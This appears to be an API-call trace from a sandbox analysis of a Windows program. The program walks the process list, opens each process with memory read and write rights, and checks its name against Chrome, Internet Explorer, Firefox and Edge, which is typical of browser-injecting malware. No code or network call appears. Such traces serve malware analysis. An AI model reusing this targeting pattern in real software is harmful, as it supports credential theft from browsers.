	[0233.195] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0233.198] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0233.199] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0233.200] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0233.201] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x6fb0
	[0233.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.201] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0233.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.202] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.202] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0233.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.203] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.203] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0233.204] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x6fb4
	[0233.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.204] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0233.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.205] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.206] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0233.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.207] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.207] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0233.208] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x6fb8
	[0233.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.208] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0233.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.209] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.209] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0233.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.210] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.210] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0233.211] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x6fbc
	[0233.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.211] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0233.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.212] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.212] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0233.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.213] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.213] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0233.214] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x6fc0
	[0233.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.214] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0233.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.215] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.215] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0233.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.216] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.216] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0233.217] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x6fc4
	[0233.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.217] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0233.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.218] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.218] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0233.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.219] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.219] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0233.220] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x6fc8
	[0233.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.222] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0233.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.222] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.223] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0233.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.223] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.223] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0233.224] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x6fcc
	[0233.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.225] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0233.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.225] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.225] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0233.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.226] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.226] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.227] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x6fd0
	[0233.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.227] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.228] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.228] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.229] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.229] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.230] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x6fd4
	[0233.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.230] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.231] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.231] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.232] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.232] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.233] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x6fd8
	[0233.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.233] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.234] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.234] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.235] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.235] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.236] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x6fdc
	[0233.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.236] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.239] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.239] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.240] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.240] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.241] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x6fe0
	[0233.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.241] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.242] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.242] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.243] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.243] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.244] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x6fe4
	[0233.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.244] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.245] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.246] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.246] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.246] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.248] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x6fe8
	[0233.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.248] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.249] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.250] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.250] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.251] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0233.253] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x6fec
	[0233.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.254] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0233.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.254] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.255] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0233.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.255] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.256] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.257] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x6ff0
	[0233.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.257] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.258] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.258] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.258] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.259] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0233.259] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x6ff4
	[0233.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.259] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.260] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.260] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.260] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.261] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0233.261] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x6ff8
	[0233.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.262] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0233.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.262] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.262] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0233.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.262] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.263] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.263] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x6ffc
	[0233.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.264] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.264] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.264] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.264] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.265] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0233.265] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x7004
	[0233.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.266] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0233.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.266] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.266] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0233.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.267] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.267] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0233.269] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x7008
	[0233.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.269] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0233.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.269] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.270] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0233.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.270] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.271] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0233.272] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x700c
	[0233.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.272] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0233.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.272] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.272] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0233.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.272] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.273] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0233.273] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x7010
	[0233.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.273] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0233.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.274] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.274] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0233.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.274] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
